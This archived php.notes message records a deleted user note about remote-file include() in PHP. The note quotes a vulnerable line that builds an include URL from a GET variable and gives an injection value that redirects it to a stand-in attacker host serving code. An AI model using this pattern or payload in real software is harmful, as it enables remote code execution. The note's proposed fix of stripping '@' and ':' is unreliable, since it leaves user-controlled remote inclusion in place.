note 21273 deleted from features.remote-files by nlopess
| From: | nlopess@php.net | Date: | Wed, 16 Mar 2005 15:14:53 +0000 |
| Subject: | note 21273 deleted from features.remote-files by nlopess | ||
| References: | 1 | Groups: | php.notes |
| Request: | Send a blank email to php-notes+get-86554@lists.php.net to get a copy of this message | ||
Note Submitter: php at jerde dot net
----
You must be VERY careful if you allow a variable to control the URL of an include()ed file.
A previous poster suggested:
include("http://www.php.net/".$HTTP_GET_VARS["url"]);
This, however, won't work in all cases. For example, set the variable to
"@www.evil-site.dom/evil-code.phps"
Your carefully constructed pre-URL is now sent merely as a username to the attacker's web site.
Stripping out "@" and ":" would be a good idea, and THEN you'd probably be
safe.
- Peter Jerde
Minneapolis, Minnesota, USA